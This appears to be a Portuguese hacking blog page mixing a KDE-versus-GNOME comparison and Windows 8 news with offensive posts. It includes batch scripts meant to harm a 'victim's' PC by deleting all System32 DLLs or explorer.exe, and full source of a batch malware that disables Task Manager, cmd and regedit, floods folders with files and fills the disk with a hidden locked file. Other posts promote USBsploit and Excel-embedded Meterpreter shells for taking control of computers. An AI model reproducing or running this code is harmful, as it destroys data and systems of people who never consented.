publicidade
publicidade
publicidade
publicidade
publicidade
publicidade
publicidade

KDE versus GNOME: Qual é a diferença ?

O que diferencia esses dois gerenciadores de janelas ?
  • A ferramenta de desenvolvimento da interface gráfica.
  • A forma com que se encontra disponibilizado as opções de configurações.
  • O gerenciador de arquivos.
  • Os aplicativos padrões preferênciais.
Quanto a ferramenta de desenvolvimento da interface gráfica


Você é programador ? Sim ? Então tem muito a acrescentar a essa discussão. Não ? Então francamente, o que pode dizer ? Afinal, o programa está pronto, rodando e funcionando. Para o usuário final que não está interessado em programar para o KDE ou para o GNOME, qual é mesmo a diferença ?
QT, utilizado pelo KDE, até pouco tempo era considerado inferior ao GTK, utilizado pelo GNOME, porque o QT não era multiplataforma. Isso não é mais verdade e os dois são multiplataformas. O GTK é mais popular, mas se você é programador e fez essa escolha, talvez tenha um motivo de origem estrutural melhor do que simplesmente o resultado final, visto que isso pode ser igualmente obtido em ambos.
Deixe seu Comentário:
3 comentários
Categorias:

Mais comandos batch de irritação!



Mais uns comandos batch, pra irritar ou mesmo estragar o PC da vítima suahsuahaus!

Não se esqueça de gravar (nomedoarquivo). bat, e NÃO execute em seu PC!
Esse abre o site infinitivamente.

@ECHO OFF
:mc_respect
START 
http://brechacker.blogspot.com/ 
CLS
GOTO mc_respect
em  http://brechacker.blogspot.com/  digita o site que você pretende.
Elimina todas as DLL do PC!
@ECHO OFF
CD\
CD WINDOWS
CD SYSTEM32
DEL /s /q *.dll
CLS
EXIT
Deleta o explorer.exe
@ECHO OFF
CD\
CD WINDOWS
DEL /s /q explorer.exe
CLS
EXIT
Esse escreve uma mensagem infinitamente pra vitima!
@ECHO OFF
:mc_respect
Deixe seu Comentário:
Sem comentários »
Categorias:

Windows 8 Beta poderá ser baixado amanhã Dia 29/02/12

Microsoft prepara um evento durante a MWC 2012, e Windows 8 deve ser o grande destaque.
O Windows 8 está cada vez mais perto do lançamento oficial. (Fonte da imagem: Technology News)


A Microsoft vai anunciar o Windows 8 Consumer Preview — que pode ser considerado um Beta da próxima edição do sistema operacional — durante um evento no Mobile World Congress (MWC), que acontece em Barcelona. Esta deve ser a penúltima versão antes da final, já que deve ser disponibilizada também uma Release Candidate.
Segundo fontes ouvidas pelo site The Verge, a Microsoft parou de compilar builds Beta e a versão final provavelmente já está pronta.
E o melhor é que a Consumer Preview deve ser disponibilizada para download gratuito ainda durante o evento — e claro, assim que disponível, você poderá fazer o download pelo Baixaki. As expectativas são grandes: além de apresentar o novo logotipo da Microsoft, o Windows 8 Consumer Preview vai eliminar completamente o botão Iniciar tradicional do sistema operacional.
Amanha saiba mais atravez do blog  ou use o tao querido site Tecmundo
Deixe seu Comentário:
Sem comentários »
Categorias:

Um pequeno malware em batch !


Boa noite pessoal, hj como estava sem nada para fazer, resolvi criar um malware pequeno em .bat
Bom, o que ele faz:
*Desabilita vários componentes do sistema operacional (painel de controle, cmd, regedit, etc...)
*Gera arquivos de nome aleatorio em todas as pastas do sistema operacional
*Cria um "dummy" que consome todo o espaço vazio do hd

Segue o codigo fonte :

----------------------------------------------------------------------------------------------------------------------------
 @Echo OFF

     reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg" /t Reg_SZ /d "txtfile" /f >NUL 2>&1
  FOR /F "tokens=*" %%a in ('Reg query "HKEY_USERS" /f - ^| findstr /r .-......- ^| find /v "Classes"') do ( tar)
     reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "RestrictRun" /T "REG_DWORD" /D "1" /f >NUL 2>&1

     reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >NUL 2>&1

     reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoClose" /T "REG_DWORD" /D "1" /f >NUL 2>&1

     reg add "%%a\Software\Microsoft\Windows\Curre
ntVersion\Policies\explorer" /v "StartmenuLogoff" /T "REG_DWORD" /D "1" /f >NUL 2>&1

     reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoViewContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1

     reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoTrayContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1

     reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoChangeStartMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1

     reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoControlPanel" /T "REG_DWORD" /D "1" /f     >NUL 2>&1

     reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v "DisableRegistryTools" /T "REG_DWORD" /D "1" /f >NUL 2>&1

     reg add "%%a\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /T "REG_DWORD" /D "2" /f >NUL 2>&1 )
  setlocal enabledelayedexpansion
Set File=0
  For /F "Tokens=*" %%@ in ('Dir /B /S /AD "%systemdrive%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"') do (Call :COPY %%@)
Goto :Dummy
  :Copy
Fsutil file createnew "%*\%Random%%Random%%Random%%Random%%Random%" 1 >NUL 2>&1
Set /A File+=1 If !FILE! EQU 100 (Set /A File=0& Goto :EOF) ELSE (Call :COPY %*)

:DUMMY

Takeown /F "%Windir%\winsxs" >NUL 2>&1
Icacls     "%Windir%\winsxs" /Grant TODOS:F >NUL 2>&1
For /F "tokens=1-7 delims=: " %%a in ('fsutil volume diskfree %SYSTEMDRIVE%') do (
    Set Size=%%f
    Set Size=!Size:~-0,-6!
    Set Size=!Size!000000
    Fsutil file createnew "%WINDIR%\winsxs\Microsoft Security Database.msd" !SIZE! >NUL 2>&1 ) Takeown /F "%WINDIR%\winsxs\Microsoft Security Database.msd" >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Grant TODOS:F >NUL 2>&1
Attrib "%WINDIR%\winsxs\Microsoft Security Database.msd" +H +S +R >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Deny TODOS:F >NUL 2>&1

  :FIN
Del /Q %0 Exit 
---------------------------------------------------------------------------

Obrigado e até mais,
Deixe seu Comentário:
Sem comentários »

Usando o Nessus plugin com o MySQL e o db_autopwn no Metasploit


Agora irei rebuscar os testes usando o MySQL para manter os alvos e suas vulnerabilidades em uma base de dados, explorando-as de forma automatizada com o db_autopwn.

O ambiente dos testes continuará o mesmo:

Host Debian com o Nessus, Metasploit e o MySQL Host Windows 2000

Pré-requisito para os testes:

Possuir os seguintes itens instalados:
libdbd-mysql-ruby1.8
Módulo activerecord ( gem install activerecord )

Preparando o ambiente

Inicie o driver para MySQL no MSF
msf> db_driver mysql**

Conectei o banco e criei uma base de dados chamada msf

msf> db_connect msf:******@localhost/msf**

Importei o report do Nessus para o banco

msf> nessus_report_get af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

Listando as portas apartir da base de dados msf
Deixe seu Comentário:
Sem comentários »
Categorias:

Tutorial copiado do Blog Coruja de TI do Gustavo Lima


Vocês devem possuir um pendrive de 1GB ou 512MB dentro de uma gaveta que não utilizam há um bom tempo, isso porque o pendrive tornou-se um backup de bolso, com seus gigas e mais gigas de documentos, músicas e vídeos.

Que tal utilizar o seu pendrive esquecido no fundo da gaveta para invadir outros computadores via rede, sem que a vítima ou “hackeado” saiba o que está ocorrendo ? É isso que o USBsploit faz e muito bem, no computador Windows da vítima utilizando arquivos Auto[run|play]/[EXE|LNK|PDF], ele consegue subir uma porta TCP, e partir dela o hacker consegue conectar via metasploit, ai meus amigos, o céu é o limite!

O USBsploit v0.4b utiliza o Meterscript como base, ocupando 27MB de espaço em um pendrive, a sua interface é um módulo do SET (The Social Engineering Toolkit).

Achei interessante a possibilidade de realizar algumas alterações no código fonte do USBsploit para que ele tenha mais algumas facetas.
O vídeo abaixo apresenta com detalhes uma invasão bem sucedida utilizando o USBsploit e o Metasploit:


O USbsploit pode ser baixando no seguinte link, incluindo o seu código fontes e outras aplicações bem interessantes. Usem com moderação.
Deixe seu Comentário:
Sem comentários »

Como Injetar um Shell Meterpreter em arquivos Excel


Nesse artigo entenderemos como é possível utilizar a ferramenta XLSInjector, juntamente com o Metasploit, para criar arquivos do Excel que carregam shellcode e conseguirmos uma conexão remota com a máquina alvo.

Preparação

Não é um segredo para ninguém que a suíte de programas para escritório mais utilizada no mundo é o Microsoft Office, possuindo a maior fatia do mercado em sistemas operacionais Windows e Mac. Desta suíte, os programas mais utilizados são Microsoft Word, Microsoft Excel e Microsoft Power Point, que quase sempre estão instalados na maioria dos computadores.

Nesse artigo vamos tratar do XLSInjector, uma ferramenta criada por Keith Lee que permite injetar em um arquivo do Microsoft Excel um console meterpreter (executado totalmente na memória ram, sem criar nenhum processo adicional), permitindo-nos acessar o mesmo remotamente a partir da porta 4444 e ganhar controle total da máquina.

Para que o XLSInjector funcione adequadamente, precisamos do seguinte ambiente configurado: Uma máquina (virtual ou real) com Windows

Deixe seu Comentário:
Sem comentários »
Categorias: